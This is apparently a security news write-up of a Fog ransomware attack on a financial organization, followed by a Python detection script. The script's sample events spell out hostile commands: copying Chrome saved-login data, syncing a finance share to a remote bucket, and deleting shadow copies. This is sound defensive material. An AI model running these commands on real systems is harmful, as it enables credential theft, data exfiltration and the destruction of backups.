Saturday, September 7, 2024

Fog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack


The Fog ransomware group, known for targeting the education and recreation sectors, has expanded its scope to financial services organizations. In the attack described here, the attackers used compromised VPN credentials to deploy the ransomware against both Windows and Linux endpoints.

Adlumin detected the ransomware activity and isolated the affected machines, preventing data encryption and theft.

While the attack originated from IP addresses in Russia, this alone cannot definitively attribute the attack to a specific geographic location due to potential masking techniques.


The Fog ransomware, a variant of STOP/DJVU, exploits compromised VPN credentials to infiltrate networks, primarily targeting education and recreation sectors.

After gaining administrative access, it disables security measures, encrypts VMDKs, and deletes backups, leaving victims with limited options. 

The ransomware, marked with extensions like ‘.FOG’ or ‘.FLOCKED’, demands a ransom via a Tor network platform.

Unlike traditional APT groups, Fog’s origin remains unattributed, suggesting a new, highly skilled threat actor.

The attackers began their network exploration by sending ping requests to various network devices and saving the results in text files named ‘pings.txt’ and ‘pingw.txt’. 

Using elevated privileges obtained from compromised service accounts, they then employed the ‘Advanced_Port_Scanner_2.5.3869(1).exe’ tool to scan network hosts for open ports and gather detailed information about their services, which allowed them to identify potential vulnerabilities and entry points into the network.

The Adlumin team discovered that a Russian IP address had compromised an unprotected system, initiating the attack, where the attackers exploited compromised service accounts and domain trust relationships to traverse the network. 

They executed the ‘nltest /domain_trusts’ command to gather information about domain trust relationships. Subsequently, they employed the ‘SharpShares.exe’ binary to map network drives and share folders on other devices, facilitating further lateral movement within the network.


The attacker used the `esentutl.exe` command-line tool to create a backup of login data stored in the Google Chrome user profile folder, which included encrypted credentials for various websites. 

The backup was saved to a temporary file in the same directory, allowing the attacker to potentially extract the credentials later using decryption techniques.

Indicator of Compromise

The attacker leveraged Rclone, a file transfer tool, to selectively sync recently modified data (excluding specific file types) from compromised systems. 

Next, they executed “locker.exe” with the “-id” switch, which likely carried a unique identifier for the attack, while the “-target” switch specified a network share for data exfiltration.

Finally, the attackers used WMIC and PowerShell commands to delete shadow copies, hindering file recovery from backups. This demonstrates a multi-pronged approach that combines data theft with encryption to pressure victims into paying the ransom.

The security team identified and isolated endpoints compromised by a Fog ransomware attack and found malicious binaries and vulnerable endpoints that allowed unauthorized access. 

To mitigate risks, it has been recommended to implement MFA, update VPN software, monitor VPN access, automate endpoint isolation, use a comprehensive security platform, disable unnecessary services, regularly back up data, apply the principle of least privilege, conduct security audits, establish incident response plans, and monitor network traffic.
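The intrusion chain above (ping results written to text files, the port scanner, nltest and SharpShares, the esentutl copy of Chrome's Login Data, Rclone sync, locker.exe, and shadow copy deletion) maps onto simple process-creation detections, and the “automate endpoint isolation” recommendation can be driven by how many stages of that chain one host and account have shown. The following is an added example, not Adlumin's code or anything from the write-up: it runs one rule per reported activity over constructed JSON process-creation events. The log shape, host and user names, the command-line arguments in the samples, and the isolation threshold of three distinct stages are all assumptions.

```python
"""Added example: detection rules for the Fog intrusion chain described in the
article, run over constructed process-creation log lines. Not Adlumin's code;
the JSON log shape, host/user names and the isolation threshold are assumptions."""
import json
import re
from collections import Counter

# One rule per activity the article reports, keyed "<stage>_<name>" so the stage
# prefix can be used to measure how much of the chain one host/user has shown.
# Every pattern is matched case-insensitively against the full command line.
RULES = {
    "recon_ping_results_to_file": re.compile(r"\bping(\.exe)?\b.*\bping[sw]\.txt\b", re.I),
    "recon_advanced_port_scanner": re.compile(r"advanced_port_scanner", re.I),
    "discovery_domain_trusts": re.compile(r"\bnltest(\.exe)?\b.*/domain_trusts", re.I),
    "discovery_share_enum_sharpshares": re.compile(r"\bsharpshares(\.exe)?\b", re.I),
    "credential_chrome_logindata_esentutl": re.compile(r"\besentutl(\.exe)?\b.*login data", re.I),
    "exfil_rclone_sync": re.compile(r"\brclone(\.exe)?\b\s+(sync|copy|move)\b", re.I),
    "impact_locker_execution": re.compile(r"\blocker\.exe\b.*\s-id\b.*\s-target\b", re.I),
    "impact_shadow_copy_deletion": re.compile(
        r"(wmic.*shadowcopy.*delete|vssadmin.*delete\s+shadows|win32_shadowcopy.*delete)", re.I),
}

# Constructed sample events (not real telemetry). One endpoint shows the whole
# chain under a service account; a second endpoint shows only ordinary activity.
_ACTOR = dict(host="WS-FIN-04", user="CORP\\svc-backup")
_BENIGN = dict(host="WS-HR-02", user="CORP\\jdoe")
_EVENTS = [
    dict(ts="2024-09-01T02:11:03Z", cmd="cmd.exe /c ping -n 1 10.0.10.5 >> C:\\Users\\Public\\pings.txt", **_ACTOR),
    dict(ts="2024-09-01T02:20:41Z", cmd="C:\\Users\\Public\\Advanced_Port_Scanner_2.5.3869(1).exe", **_ACTOR),
    dict(ts="2024-09-01T02:31:12Z", cmd="nltest /domain_trusts", **_ACTOR),
    dict(ts="2024-09-01T02:33:50Z", cmd="SharpShares.exe", **_ACTOR),
    dict(ts="2024-09-01T02:45:09Z",
         cmd='esentutl.exe /y "C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" '
             '/d "C:\\Users\\jdoe\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp"', **_ACTOR),
    dict(ts="2024-09-01T03:02:17Z", cmd='rclone.exe sync C:\\Shares\\Finance remote:bucket --max-age 30d --exclude "*.exe"', **_ACTOR),
    dict(ts="2024-09-01T03:10:05Z", cmd="locker.exe -id PLACEHOLDER_ID -target \\\\FS01\\Finance", **_ACTOR),
    dict(ts="2024-09-01T03:11:30Z", cmd="wmic shadowcopy delete", **_ACTOR),
    dict(ts="2024-09-01T03:11:48Z",
         cmd='powershell.exe -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"', **_ACTOR),
    dict(ts="2024-09-01T08:15:00Z", cmd="ping -n 4 10.0.0.1", **_BENIGN),
    dict(ts="2024-09-01T08:16:22Z", cmd="svchost.exe -k netsvcs", **_BENIGN),
]
SAMPLE_LOGS = [json.dumps(e) for e in _EVENTS] + ["this line is not JSON"]


def detect(log_lines):
    """Parse each JSON line and return (rule_name, event) for every rule that fires."""
    hits = []
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a malformed line must not abort the whole pass
        cmd = event.get("cmd", "")
        for name, pattern in RULES.items():
            if pattern.search(cmd):
                hits.append((name, event))
    return hits


def summarize(hits):
    """Count hits per rule and per (host, user) so a chain on one endpoint stands out."""
    by_rule = Counter(name for name, _ in hits)
    by_actor = Counter((ev.get("host"), ev.get("user")) for _, ev in hits)
    return by_rule, by_actor


def chain_score(hits, actor):
    """Number of distinct stages (recon, discovery, credential, exfil, impact) seen for actor."""
    stages = {name.split("_", 1)[0] for name, ev in hits if (ev.get("host"), ev.get("user")) == actor}
    return len(stages)


def should_isolate(hits, actor, threshold=3):
    """Assumed isolation policy: three or more distinct stages on one host/user pair."""
    return chain_score(hits, actor) >= threshold


if __name__ == "__main__":
    found = detect(SAMPLE_LOGS)
    by_rule, by_actor = summarize(found)
    for rule, count in sorted(by_rule.items()):
        print(f"{count:2d}  {rule}")
    for actor in by_actor:
        print(actor, "stages:", chain_score(found, actor), "isolate:", should_isolate(found, actor))
```

Each rule is deliberately narrow (the ping rule only fires when output is redirected into pings.txt or pingw.txt, so routine troubleshooting on the HR host does not alert), and the isolation decision keys on breadth of the chain rather than any single hit, which is what keeps a lone `esentutl` or `rclone` invocation from isolating a machine on its own.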

